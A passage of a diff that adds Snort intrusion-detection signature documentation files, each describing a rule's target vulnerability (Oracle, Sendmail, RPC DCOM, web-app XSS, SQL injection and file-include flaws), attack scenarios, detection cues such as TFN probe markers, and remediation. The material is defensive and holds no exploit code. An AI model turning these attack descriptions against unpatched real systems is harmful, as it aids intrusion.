+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2336.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 
+2336
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Verilink NetEngine Broadband Router.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+TFTP is used to transfer files between hosts and devices. This event is indicative of spurious
+activity in TFTP traffic between hosts.
+
+It is possible for an attacker to send a NULL opcode to a Verilink
+NetEngine Broadband Router, this may cause the router to become
+unresponsive.
+
+--
+Affected Systems:
+	Verilink NetEngine 6100-4
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to cause the
+DoS.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2087.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2087
+
+--
+Summary:
+vulnerability in Sendmail.
+
+--
+Impact:
+The remote attacker can gain access to a machine with the credentials of
+the user running the Sendmail daemon, usually 'root'.
+
+--
+Detailed Information:
+A vulnerability exists in the Sendmail MTA Daemon that could allow an
+attacker the opportunity to gain root access.
+
+A programming error exists such that a buffer overflow can be caused
+using the header fields in an SMTP session. Using the '<' and '>'
+characters in the 'from' field, an attacker can increment a counter to
+the extent that the buffer exceeds it's limit.
+
+--
+Affected Systems:
+All systems using Sendmail prior to version 8.12.8
+	
+--
+Attack Scenarios:
+The attacker can craft an email message that contains a "from" header
+with enough sequences of "<>" to cause a counter to exceed it's maximum
+size thus causing the buffer overflow.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All users of Sendmail should upgrade to the latest non-affected version
+as soon as possible.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+http://www.kb.cert.org/vuls/id/398025
+
+CVE Entry
+CAN-2002-1337
+
+Sendmail:
+http://www.sendmail.org/8.12.8.html
+
+--
--- /dev/null
+++ b/doc/signatures/2120.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2120
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP CREATE command
+to send a suspiciously long string to port 143 on an internal server.
+This may indicate an attempt to exploit a buffer overflow vulnerability
+in the IMAP CREATE command in the Alt-N MDaemon IMAP server. This may
+also affect other IMAP implementations.
+
+--
+Impact:
+Remote execution of arbitrary code, which could allow an attacker to
+interfere with or crash mail services. The attacker must have a valid
+IMAP account and must be authenticated by the mail server to attempt
+this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a buffer overflow
+vulnerability in the Alt-N MDaemon IMAP server CREATE command. If an
+authenticated user creates a folder with a sufficiently long name on the
+Alt-N MDaemon IMAP server, arbitrary commands can be executed with
+system privileges. 
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.7.5 or Alt-N MDaemon 6.7.9 IMAP servers.
+
+--
+Attack Scenarios:
+An authenticated user can create a new folder with a sufficiently long
+name, creating a buffer overflow condition. The attacker can then
+execute arbitrary code with system privileges, which may allow the
+attacker to interfere with or crash mail services.
+
+--
+Ease of Attack:
+Exploits exist, but the user must have an account and be authenticated
+before attempting the exploit.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11577
+
+--
--- /dev/null
+++ b/doc/signatures/100000678.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000678
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "header.php" using a remote file being passed as the 
+"mod_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "mod_root" parameter in the "header.php" script used by 
+the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3187.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3187
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2529.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2529
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000757.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000757
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "QTO File Manager" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "delete" parameter in the "qtofm.php" script used by the "QTO File Manager" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using QTO File Manager
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/539.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+539
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000659.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000659
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2285.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2285
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2528.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2528
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/707.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+707
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000457.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000457
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "ASP Stats" application running on a webserver. Access to 
+the file "pages.asp" with SQL commands being passed as the "order" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "order" parameter in the "pages.asp" script used by the 
+"ASP Stats" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ASP Stats
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/525.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 525
+
+--
+Summary:
+This event is generated when UDP traffic to port 0 is detected. This 
+should not be seen in normal UDP communications.
+
+--
+Impact:
+Denial of Service against Checkpoint Firewall 1 devices. Possible 
+reconnaisance. This may be an attempt to verify the existance 
+of a host or hosts at a particular address or address range.
+
+--
+Detailed Information:
+UDP traffic to port 0 is not valid under normal circumstances.
+
+Certain versions of Checkpoints Firewall 1 are subject to a Denial of 
+Service attack when UDP packets to port 0 are sent via VPN-1.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker could send packets to a host with a destination port of 0. 
+The attacker might also be using hping to verify the existance of a host
+as a prelude to an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow UDP traffic to port 0.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0675
+
+--
--- /dev/null
+++ b/doc/signatures/3409.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3409
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/221.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+221
+
+--
+Summary:
+This event is generated when a host attempts to communicate with a Tribal Flood Network (TFN) DDoS client.
+
+--
+Impact:
+Reconnaissance.  If the listed source IP is in your network, it may be a TFN attacker or it may be probing for another attacker's TFN clients.  If the listed destination IP is in your network, it may be a TFN client. 
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with clients to launch attacks. An attacker may probe for TFN clients using an ICMP echo request with an ICMP identification number of 678 and a string of "1234" in the payload. 
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN client, an attacker may attempt to communicate with it.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer Stefan Puffer <drsuse@drsuse.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS443
+
+--
--- /dev/null
+++ b/doc/signatures/176.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+146
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
--- /dev/null
+++ b/doc/signatures/2621.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2621
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "register_flavor_change" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the second variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000621.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000621
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "log_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "log_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/318.txt
@@ -0,0 +1,64 @@
+SID:
+318
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a vulnerable 
+version of bootpd
+--
+
+Impact:
+If attack is successful, total system compromise from a remote attacker
+--
+
+Detailed Information:
+Due to improper handling of bounds checking in bootp request packets 
+Bootpd version 2.4.3(and earlier) is susceptible to several types of 
+buffer overflows. A successful exploit will result in complete 
+compromise of the attacked system. Any system running Bootpd version 
+Stanford University bootpd 2.4.3 should consider themselves vulnerable
+--
+
+Affected Systems:
+	Debian Linux 1.1
+	Debian Linux 1.2
+	Debian Linux 1.3
+	Debian Linux 1.3.1
+	Debian Linux 2.0
+	Stanford University bootpd 2.4.3
+--
+
+Attack Scenarios:
+An attacker can exploit vulnerable bootpd servers and modify system 
+files as the root user or create a shell with root privileges
+--
+
+Ease of Attack:
+Simple, Sample code exists
+--
+
+False Positives:
+none
+--
+
+False Negatives:
+none
+--
+
+Corrective Action:
+Vendors have supplied patched versions of bootpd, upgrade
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2782.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2782
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
